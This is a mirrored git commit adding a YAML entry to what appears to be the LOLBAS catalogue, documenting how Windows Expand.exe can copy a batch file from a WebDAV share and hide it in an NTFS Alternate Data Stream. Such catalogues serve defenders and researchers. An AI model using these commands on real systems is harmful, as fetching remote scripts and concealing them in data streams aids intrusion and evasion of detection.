mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-27 04:32:24 +02:00
MD files generate from Script, and adjustments to readme
This commit is contained in:
23
yml/OSBinaries/Expand.yml
Normal file
23
yml/OSBinaries/Expand.yml
Normal file
@@ -0,0 +1,23 @@
|
||||
---
|
||||
Name: Expand.exe
|
||||
Description: Download, Copy, Add ADS
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
|
||||
Description: 'Copies source file to destination.'
|
||||
- Command: expand c:\ADS\file1.bat c:\ADS\file2.bat
|
||||
Description: 'Copies source file to destination.'
|
||||
- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
|
||||
Description: 'Copies source file to destination Alternate Data Stream (ADS).'
|
||||
Full Path:
|
||||
- c:\windows\system32\Expand.exe
|
||||
- c:\windows\sysWOW64\Expand.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/infosecn1nja/status/986628482858807297
|
||||
- https://twitter.com/Oddvarmoe/status/986709068759949319
|
||||
Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe
|
||||
|
Reference in New Issue
Block a user